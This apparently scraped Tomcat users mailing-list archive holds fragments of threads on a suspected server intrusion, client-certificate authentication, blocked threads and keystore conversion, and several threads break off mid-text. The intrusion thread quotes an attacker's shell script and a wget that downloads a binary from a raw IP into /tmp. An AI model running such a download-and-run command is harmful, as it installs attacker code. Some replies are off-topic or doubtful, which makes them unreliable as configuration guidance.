RE: Regarding i think an intrusion
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org

Hello Chris, but this logfile was only one day.

MG> Ay Caramba!

Maybe I had a concept mismatch trying to capture the exact moment when the execution begins. My command was

    # Poll every 3 seconds; when a wget process shows up, send SIGQUIT (kill -3)
    # to the java process(es) so the JVM writes a thread dump.
    while true; do
        CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l)
        if [ "$CUENTO" -gt 0 ]; then
            PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
            # Message: "wget found running, taking JVM dump..."
            echo -e "Se encontro wget corriendo, sacando dump de JVM..."
            # Left unquoted on purpose: there may be more than one java PID
            kill -3 $PIDJAVA
        fi
        sleep 3
    done

Maybe too many dumps all together, now I'm trying to get a live capture without luck =( If you know a better method, please let me know it.

Thanks for your effort, kind regards, Leonardo

Regards.- Leonardo Santagostini

MG> Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to use JDK @ 1.7 (now)
MG> this:

ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
    at java.lang.Thread.sleep(Native Method)
    at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
    at java.lang.Thread.run(Thread.java:662)

MG> These informational log entries produce A LOT of noise
MG> log4j.properties
MG> log4j.logger.org.quartz=OFF //(Shut up, Quartz)
MG> that:

ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at
java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at 
java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at
RE: Configuration of auth-constraint ?
Date: Sun, 4 May 2014 12:42:04 +0530
Subject: Configuration of auth-constraint ?
From: motgu...@gmail.com
To: users@tomcat.apache.org

I am using client certificates in my application. Here is the configuration I did.

Step 1: Added the below snippet in the tomcat-users.xml file:

    <role rolename="certrole"/>
    <user username="ignoreAndCheckInWebApp" password="nopass" roles="certrole"/>

Step 2: Added the below snippet in web.xml:

    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Client Certificate Auth</web-resource-name>
        <url-pattern>/MyClientAuthenticator.jsp</url-pattern>
      </web-resource-collection>
      <auth-constraint>
        <role-name>certrole</role-name>
      </auth-constraint>
    </security-constraint>
    <login-config>
      <auth-method>CLIENT-CERT</auth-method>
    </login-config>

Placed a jar file containing MySSlAuthentication.java into the lib folder of Tomcat.

Step 3: Then added the below valve element under tomcat\conf\context.xml:

    <Valve className="MySSlAuthentication"/>

So it's more or less the procedure mentioned at http://twoguysarguing.wordpress.com/2009/11/03/mutual-authentication-with-client-cert-tomcat-6-and-httpclient/

My understanding: when the browser tries to call MyClientAuthenticator.jsp, the server asks the client certificate from the browser. But why do we need the two entries

    <role rolename="certrole"/>
    <user username="ignoreAndCheckInWebApp" password="nopass" roles="certrole"/>

under tomcat-users.xml, and what is the use of the below entry?

    <auth-constraint>
      <role-name>certrole</role-name>
    </auth-constraint>

MG> for the URL presented at /MyClientAuthenticator.jsp
    <url-pattern>/MyClientAuthenticator.jsp</url-pattern>
    </web-resource-collection>
    <auth-constraint>
MG> The role from tomcat-users.xml defined as 'certrole'
    <role-name>certrole</role-name>
    </auth-constraint>
    </security-constraint>
    <login-config>
MG> would be authenticated (based on the contents of the presented Client Cert)
    <auth-method>CLIENT-CERT</auth-method>
    </login-config>
MG> Makes Sense?
RE: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails
Date: Sat, 3 May 2014 19:31:17 -0400
Subject: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails
From: dhayamoorthi2...@gmail.com
To: users@tomcat.apache.org

Hi,

In Tomcat7, we are trying to do client certificate authentication using datasource realm. But it fails. Please find the configuration below:

server.xml:

    <?xml version="1.0" encoding="UTF-8" standalone="no" ?>
    <Server port="8005" shutdown="SHUTDOWN">
      <Listener SSLEngine="on" className="org.apache.catalina.core.AprLifecycleListener"/>
      <Listener className="org.apache.catalina.core.JasperListener"/>
      <Listener className="org.apache.catalina.core.JreMemoryLeakPreventionListener"/>
      <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener"/>
      <Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener"/>
      <!-- <GlobalNamingResources>
             <Resource auth="Container" description="User database that can be updated and saved" factory="org.apache.catalina.users.MemoryUserDatabaseFactory" name="UserDatabase" pathname="conf/tomcat-users.xml" type="org.apache.catalina.UserDatabase"/>
           </GlobalNamingResources> -->
      <Service name="Catalina">
        <Connector SSLEnabled="true" clientAuth="true" connectionTimeout="1" keyAlias="masfed_server_dit" keystoreFile="/opt/ADP/keystores/masfed_server_dit.jks" keystorePass="sso@di" maxThreads="150" port="8443" protocol="org.apache.coyote.http11.Http11Protocol" scheme="https" secure="true" server="Server" sslProtocol="TLS" truststorefile="/opt/ADP/keystores/masfed_server_dit.jks" truststorepass="sso@di" enablelookups="false"/>
        <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
        <Engine defaultHost="localhost" name="Catalina">
          <!-- <Realm className="org.apache.catalina.realm.MemoryRealm" resourceName="UserDatabase"/> -->
          <!-- <Realm className="org.apache.catalina.realm.LockOutRealm"><Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> </Realm> -->
          <GlobalNamingResources>
            <Realm className="org.apache.catalina.realm.DataSourceRealm" dataSourceName="jdbc/FederationDS" userTable="T_USER" userNameCol="USERNAME" userCredCol="PASSWORD" userRoleTable="T_USER_ROLES" roleNameCol="ROLENAME" debug="99" allRolesMode="authOnly" />
          </GlobalNamingResources>
          <Host appBase="webapps" autoDeploy="true" name="localhost" unpackWARs="true">
            <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" pattern="%h %l %u %t &quot;%r&quot; %s %b" prefix="localhost_access_log." suffix=".txt"/>
          </Host>
        </Engine>
      </Service>
    </Server>

security role configuration tomcat_base/conf/web.xml:

    <security-role>
      <role-name>masFedClient</role-name>
    </security-role>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>all</web-resource-name>
        <url-pattern>/*</url-pattern>
      </web-resource-collection>
      <auth-constraint>
        <role-name>masFedClient</role-name>
      </auth-constraint>
      <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
      </user-data-constraint>
    </security-constraint>
    <login-config>
      <auth-method>CLIENT-CERT</auth-method>
      <!-- <realm-name>tomcat-users</realm-name> -->
      <realm-name>jdbc/FederationDS</realm-name>
    </login-config>

Database has all the required tables and columns. But authentication fails with the below mentioned error:

    FINE: Checking validity for '$'

MG> this is an insane value..change it to something meaningful using [A-Z][O-9] characters
MG> besides which your user_name length is WAY beyond the 15 byte allocation for the table
MG> create table T_USER ( user_name varchar(15) not null primary key, user_pass varchar(15) not null );

    May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
    FINE: Checking validity for 'CN=VeriSign Class 3 Extended Validation SSL SGC CA, OU=Terms of use at https://www.verisign.com/rpa (c)06, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US'
    May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
    FINE: Checking validity for 'CN=VeriSign Class 3 Public Primary Certification Authority - G5, OU=(c) 2006 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US'
    May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase getPrincipal
    FINE: Got user name from X509 certificate: $$
    May 03, 2014 7:16:29 PM org.apache.catalina.authenticator.AuthenticatorBase invoke
    FINE: Failed authenticate() test

For security purpose, I had made the certificate cn name as $$.

MG> cn is ROLE not the user_name
MG> https://tomcat.apache.org/tomcat-7.0-doc/realm-howto.html

The error message does not tell why the authentication is failing.

MG> yes it does ..it cannot authenticate $$

Do I need to enable additional
RE: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate
Krishna

Let me check with the engineers who want to work for you for free

From: karip...@teksystems.com
To: users@tomcat.apache.org
Date: Fri, 2 May 2014 04:55:18 -0400
Subject: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate

Hi,

1. We are using Tomcat 7.0.39 in our application.
2. We have implemented Two Way SSL authentication using java keytool
3. Issue is, when we create a new client certificate and add it to Java Keystore(.jks), we are unable to authenticate unless we restart the Tomcat.

So, every time we add a new client certificate, we are restarting the Tomcat. Is there any way to handle this scenario without restarting the Tomcat?

I have read the document thoroughly, but I didn't get any information regarding this. Can you please help us on this. Thanks In advance.

--
Thanks Regards,
Krishna Chaitanya Aripaka | Consultant
Cell: +91 92912 41123 | Work : +91 40 30113024

This electronic mail (including any attachments) may contain information that is privileged, confidential, and/or otherwise protected from disclosure to anyone other than its intended recipient(s). Any dissemination or use of this electronic mail or its contents (including any attachments) by persons other than the intended recipient(s) is strictly prohibited. If you have received this message in error, please notify us immediately by reply e-mail so that we may correct our internal records. Please then delete the original message (including any attachments) in its entirety. Thank you.

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
RE: BLOCKED threads
Managing Provider Tokens

Like the provider, the consumer must be responsible for managing the OAuth tokens. The necessary interface for managing the consumer tokens is OAuthConsumerTokenServices which are only accessible via factory method. Assuming that the consumer can leverage an active HTTP session, the default HttpSessionBasedTokenServices and HttpSessionBasedTokenServicesFactory should be adequate.

so it appears that Spring is looking for an implementor for OAuthConsumerTokenServices, either HttpSessionBasedTokenServices OR HttpSessionBasedTokenServicesFactory

http://spring-security-oauth.codehaus.org/oauth1.html#Managing_Provider_Tokens

Martin

Date: Fri, 2 May 2014 15:22:01 -0700
From: rallav...@gmail.com
To: users@tomcat.apache.org
Subject: BLOCKED threads

All,

Tomcat Version: 7.0.47
JVM Version: 1.7.0_51-b13

I see many blocked threads (90) in the thread dump. There are mainly two monitors that block 69 threads. One of them is below. It appears that it is simply trying to log.

-- http-bio-28080-exec-396 daemon prio=10 tid=0x7fcbc814f000 nid=0x5804 runnable [0x7fcc2144d000] java.lang.Thread.State: RUNNABLE at java.lang.Throwable.getStackTraceElement(Native Method) at java.lang.Throwable.getOurStackTrace(Throwable.java:827) - locked 0x0007e1886340 (a java.util.NoSuchElementException) at java.lang.Throwable.printStackTrace(Throwable.java:656) - locked 0x0007e207a5a8 (a java.io.PrintWriter) at java.lang.Throwable.printStackTrace(Throwable.java:721) at java.util.logging.SimpleFormatter.format(SimpleFormatter.java:157) - locked 0x0007008187e8 (a java.util.logging.SimpleFormatter) at java.util.logging.StreamHandler.publish(StreamHandler.java:196) - locked 0x0007008187b0 (a java.util.logging.ConsoleHandler) at java.util.logging.ConsoleHandler.publish(ConsoleHandler.java:105) at java.util.logging.Logger.log(Logger.java:610) at java.util.logging.Logger.doLog(Logger.java:631) at java.util.logging.Logger.logp(Logger.java:831) at
org.apache.juli.logging.DirectJDKLog.log(DirectJDKLog.java:185) at org.apache.juli.logging.DirectJDKLog.error(DirectJDKLog.java:151) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:260) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:123) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:502) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:100) at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:953) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:603) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:310) - locked 0x0007e0ba5dd8 (a org.apache.tomcat.util.net.SocketWrapper) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:744) -- The second one has the lock on StandardClassLoader. 
-- http-bio-28080-exec-605 daemon prio=10 tid=0x7fcbc82b8800 nid=0x77e6 runnable [0x7fcb919d6000] java.lang.Thread.State: RUNNABLE at java.lang.ClassLoader.findLoadedClass0(Native Method) at java.lang.ClassLoader.findLoadedClass(ClassLoader.java:1093) at java.lang.ClassLoader.loadClass(ClassLoader.java:407) - locked 0x000700810fc8 (a org.apache.catalina.loader.StandardClassLoader) at java.lang.ClassLoader.loadClass(ClassLoader.java:358) at java.util.ResourceBundle$Control.newBundle(ResourceBundle.java:2566) at java.util.ResourceBundle.loadBundle(ResourceBundle.java:1436) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1400) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354) at
RE: OpenSSL and keytool misery
apparently the provided cert that came with your P12 is not a X509v3 cert

assuming $1 is the root name of the PEM file

    openssl pkcs12 -in $1.p12 -out $1.pem -nodes -clcerts
    vi $1.pem

and you should see something like:

    /snip
    Key Attributes
    X509v3 Key Usage: nn
    /snip

please verify

Martin

Subject: Re: OpenSSL and keytool misery
From: dmik...@gopivotal.com
Date: Thu, 1 May 2014 08:53:10 -0700
To: users@tomcat.apache.org

On May 1, 2014, at 7:56 AM, Christopher Schultz ch...@christopherschultz.net wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

All,

I've been trying to convert an OpenSSL-generated key and certificate into a keystore for use with Tomcat. I had given up on this months ago and now I'm resuming my attempts.

What I've done so far:

1. Created an RSA private key using openssl
2. Created a certificate request using openssl
3. Obtained a signed certificate from a CA
4. Attempted to combine my key and certificate into a PKCS12 file using openssl:

    $ openssl pkcs12 -export -in ${HOSTNAME}.crt \
        -inkey ${HOSTNAME}.key > ${HOSTNAME}.p12

5. Import the PKCS12 store into a Java keystore using keytool:

    $ keytool -importkeystore -srckeystore ${HOSTNAME}.p12 \
        -destkeystore ${HOSTNAME}.jks -srcstoretype pkcs12

This is what my keytool now says is in the store:

    $ keytool -list -keystore conf/${HOSTNAME}.jks
    Enter keystore password:
    Keystore type: JKS
    Keystore provider: SUN
    Your keystore contains 1 entry
    1, May 1, 2014, PrivateKeyEntry,
    Certificate fingerprint (MD5): EC:FE:0A:7F:12:3D:19:39:DD:82:7A:7D:F9:AE:18:9A

I set the password for the Java keystore to changeit.

Now, in Tomcat:

    <Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
        keystoreFile="${catalina.base}/conf/${HOSTNAME}.jks"
        keystorePass="changeit"

Have you tried setting keyAlias and keyPass?

Dan

        URIEncoding="UTF-8" sslProtocol="SSL" SSLEnabled="true" scheme="https" secure="true" />

(Note that ${HOSTNAME}.jks has been expanded in my actual server.xml file.)
Here's what happens when I launch Tomcat:

    org.apache.catalina.LifecycleException: Failed to initialize component [Connector[org.apache.coyote.http11.Http11NioProtocol-8443]]
        at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:106)
        at org.apache.catalina.core.StandardService.initInternal(StandardService.java:559)
        at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
        at org.apache.catalina.core.StandardServer.initInternal(StandardServer.java:813)
        at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
        at org.apache.catalina.startup.Catalina.load(Catalina.java:638)
        at org.apache.catalina.startup.Catalina.load(Catalina.java:663)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
        at java.lang.reflect.Method.invoke(Method.java:597)
        at org.apache.catalina.startup.Bootstrap.load(Bootstrap.java:280)
        at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:454)
    Caused by: org.apache.catalina.LifecycleException: Protocol handler initialization failed
        at org.apache.catalina.connector.Connector.initInternal(Connector.java:980)
        at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
        ... 12 more
    Caused by: java.security.UnrecoverableKeyException: Cannot recover key
        at sun.security.provider.KeyProtector.recover(KeyProtector.java:311)
        at sun.security.provider.JavaKeyStore.engineGetKey(JavaKeyStore.java:121)
        at sun.security.provider.JavaKeyStore$JKS.engineGetKey(JavaKeyStore.java:38)
        at java.security.KeyStore.getKey(KeyStore.java:763)
        at com.sun.net.ssl.internal.ssl.SunX509KeyManagerImpl.init(SunX509KeyManagerImpl.java:113)
        at com.sun.net.ssl.internal.ssl.KeyManagerFactoryImpl$SunX509.engineInit(KeyManagerFactoryImpl.java:48)
        at javax.net.ssl.KeyManagerFactory.init(KeyManagerFactory.java:239)
        at org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketFactory.java:560)
        at org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketFactory.java:489)
        at org.apache.tomcat.util.net.NioEndpoint.bind(NioEndpoint.java:493)
        at org.apache.tomcat.util.net.AbstractEndpoint.init(AbstractEndpoint.java:640)
        at org.apache.coyote.AbstractProtocol.init(AbstractProtocol.java:434)
        at org.apache.coyote.http11.AbstractHttp11JsseProtocol.init(AbstractHttp11JsseProtocol.java:119)
        at
RE: Regarding i think an intrusion
Date: Wed, 30 Apr 2014 12:35:52 -0300
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org

Hello list, well my homework is done. Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

MG> Please paste the contents of the following log files into Pastebin and send us the link:

    -rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log
    -rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
    -rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log
    -rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
    -rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18 portal-ht.log
    -rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log
    -rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19 portal-pdi.log
    -rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log
    -rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log
    -rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG> Kind regards from the USA

Note that logsfiles are not the logfiles themselves but only a ls -lah (just for you to see the logsizes).

A little more about the infrastructure I've mounted, I'll do some ascii art.

    internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)

Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing.
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3).
Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

    [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
    java version 1.6.0_41
    Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
    Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

    [root@arcbaappvrt05 tomcat]# uname -a
    Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
    [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
    CentOS release 5.8 (Final)
    [root@arcbaappvrt05 tomcat]#

For now I haven't seen that the squid process was launched so I couldn't do a dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours

Regards.- Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:

Ok, I will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think at mid day will have all the info.

Thanks all for replying me and all the responses.

Regards, Leonardo

Regards.- Leonardo Santagostini
http://ar.linkedin.com/in/santagostini

2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:

2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:

Hello Dan, Nop, the attacker is executing locally the following

    tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
    tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

And the launch squid who tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste in pastebin access logs, config files, wherever you tell me.

This is my pstree

    [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
    init─┬─atd
         ├─java─┬─sh───wget
         │      └─263*[{java}]

sh launched by tomcat's java?

Yes: please verify that it's the JVM running Tomcat, and not just any JVM process.

Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

It shall show what is stacktrace in thread that launched external process.

+1

The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it.

A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly
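
One way to act on the thread-dump advice above once a dump has been captured, as an added example (not code from this thread or from Tomcat): it scans a HotSpot thread dump for threads that are starting or waiting on an OS process and reports the first non-JDK caller on each stack. The sample dump, its addresses and line numbers, and the class com.example.portal.ExportAction are constructed for illustration.

```python
import re

# JDK frames that show a thread starting, or waiting on, an operating-system process.
SPAWN_MARKERS = (
    "java.lang.Runtime.exec",
    "java.lang.ProcessBuilder.start",
    "java.lang.ProcessImpl.start",
    "java.lang.UNIXProcess.",   # forkAndExec, waitFor, ... on Linux JDK 6/7
)
# Packages that belong to the JDK rather than to Tomcat or deployed code.
JDK_PREFIXES = ("java.", "javax.", "sun.", "com.sun.")

HEADER = re.compile(r'^"(?P<name>.+?)".*\bnid=(?P<nid>0x[0-9a-fA-F]+)')
FRAME = re.compile(r'^\s+at (?P<method>[\w.$<>]+)\(')

# Constructed sample in the format written by kill -3 / jstack.
SAMPLE_DUMP = '''\
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
    at java.lang.Thread.sleep(Native Method)
    at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
    at java.lang.Thread.run(Thread.java:662)

"ajp-bio-8009-exec-12" daemon prio=10 tid=0x2aaac0801000 nid=0x2661 in Object.wait() [0x46e33000]
   java.lang.Thread.State: WAITING (on object monitor)
    at java.lang.Object.wait(Native Method)
    at java.lang.Object.wait(Object.java:485)
    at java.lang.UNIXProcess.waitFor(UNIXProcess.java:165)
    - locked <0x00000007e1886340> (a java.lang.UNIXProcess)
    at com.example.portal.ExportAction.run(ExportAction.java:88)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:210)
    at java.lang.Thread.run(Thread.java:662)

"process reaper" daemon prio=10 tid=0x2aaac0a11000 nid=0x2670 runnable [0x47035000]
   java.lang.Thread.State: RUNNABLE
    at java.lang.UNIXProcess.waitForProcessExit(Native Method)
    at java.lang.UNIXProcess.access$900(UNIXProcess.java:20)
    at java.lang.UNIXProcess$1$1.run(UNIXProcess.java:132)
'''


def parse_threads(dump):
    """Split a dump into [{'name', 'lwp', 'frames'}]; frames are innermost first."""
    threads, current = [], None
    for line in dump.splitlines():
        header = HEADER.match(line)
        if header:
            # nid is the native thread id in hex; in decimal it is the LWP
            # column of `ps -eLf`, which ties the Java thread to the OS view.
            current = {"name": header.group("name"),
                       "lwp": int(header.group("nid"), 16),
                       "frames": []}
            threads.append(current)
        elif current is not None:
            frame = FRAME.match(line)
            if frame:
                current["frames"].append(frame.group("method"))
            elif not line.strip():
                current = None   # a blank line ends this thread's stack
    return threads


def find_spawners(dump):
    """Return the threads whose stack contains a process-spawning JDK frame."""
    hits = []
    for thread in parse_threads(dump):
        frames = thread["frames"]
        marked = [i for i, f in enumerate(frames) if f.startswith(SPAWN_MARKERS)]
        if not marked:
            continue
        # Walk outward from the outermost spawn frame to the first frame that
        # is not JDK code: that is the servlet, JSP, valve or library that
        # asked for the process. None means a JDK-internal helper thread.
        outer = frames[marked[-1] + 1:]
        caller = next((f for f in outer if not f.startswith(JDK_PREFIXES)), None)
        hits.append({"thread": thread["name"], "lwp": thread["lwp"],
                     "spawn_frame": frames[marked[0]], "caller": caller})
    return hits


if __name__ == "__main__":
    for hit in find_spawners(SAMPLE_DUMP):
        print("%(thread)s (LWP %(lwp)d): %(spawn_frame)s called from %(caller)s" % hit)
```

A thread found this way is usually in waitFor or reading the child's output rather than still inside exec, so the dump has to be taken while the child process is alive.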
RE: Setup Issue tomcat 6 SLES 11 SSL
Date: Wed, 30 Apr 2014 14:01:11 -0500
From: tere...@tmbsw.com
To: users@tomcat.apache.org
Subject: Re: Setup Issue tomcat 6 SLES 11 SSL

On 4/30/2014 9:02 AM, Christopher Schultz wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Vincent,

On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:

